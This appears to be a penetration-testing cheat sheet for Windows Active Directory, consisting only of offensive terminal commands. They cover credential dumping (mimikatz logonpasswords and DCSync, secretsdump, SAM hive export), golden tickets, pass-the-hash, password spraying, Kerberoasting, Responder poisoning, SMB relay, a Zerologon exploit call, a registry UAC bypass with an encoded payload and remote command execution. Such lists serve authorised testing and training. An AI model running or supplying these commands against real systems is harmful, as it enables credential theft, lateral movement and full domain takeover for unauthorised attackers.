Get-ObjectAcl -Identity user
Alert! To view more content, click the description below a terminal command.
Get-ObjectAcl -Identity user
net users /domain
crackmapexec smb target -u users.txt -p 'Pass!' --continue-on-success
python3 username-generate.py -u names.txt -o generated_users.txt
PowerShell reflection trick
impacket-GetNPUsers domain/ -dc-ip target -usersfile users.txt
docker-compose up -d
net group "Domain Admins" /domain
certipy-ad find -u user -p pass -dc-ip target -vulnerable
crackmapexec smb target -u user -p pass --rid-brute
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
lsadump::dcsync /user:domain\user
net accounts
Find-DomainShare -CheckShareAccess
gpp-decrypt 'cpassword'
kerberos::golden /user:user /domain:domain /sid:SID /krbtgt:hash /ptt
netexec smb target -u users.txt -H hashes.txt --continue-on-success
. .\HostRecon.ps1; Invoke-HostRecon
impacket-GetUserSPNs -request domain/user:pass -dc-ip target
kerbrute userenum -d domain --dc target wordlist
sekurlsa::logonpasswords
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
netexec smb target -u user -p pass --sam
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:powershell
impacket-psexec -hashes :NTHASH user@target
kerberos::ptt ticket.kirbi
Invoke-UserHunter
Import-Module .\PowerView.ps1
PsExec64.exe \\target -u domain\user -p pass cmd
responder -I eth0 -wpad -v
.\Rubeus.exe kerberoast /outfile:hashes.txt
proxychains python3 scshell.py user@target
impacket-lookupsid anonymous@target
msfconsole use exploit/windows/smb/smb_relay
Get-NetUser -SPN
reg save hklm\sam c:\Temp\sam
Invoke-BloodHound -CollectionMethod All
kerberos::golden /sid:SID /domain:domain /target:host /service:svc /rc4:hash /user:user /ptt
.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin user
winrs -r:host -u:user -p:pass cmd
python3 cve-2020-1472-exploit.py 'DC$' DC-IP
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<encoded payload>"
.\GMSAPasswordReader.exe --AccountName svc_apache
impacket-secretsdump -just-dc-ntlm domain/user@target
ldapsearch -x -H ldap://target -D 'user' -w 'pass' -b 'DC=domain,DC=local'
python3 windapsearch.py --dc-ip target -U --full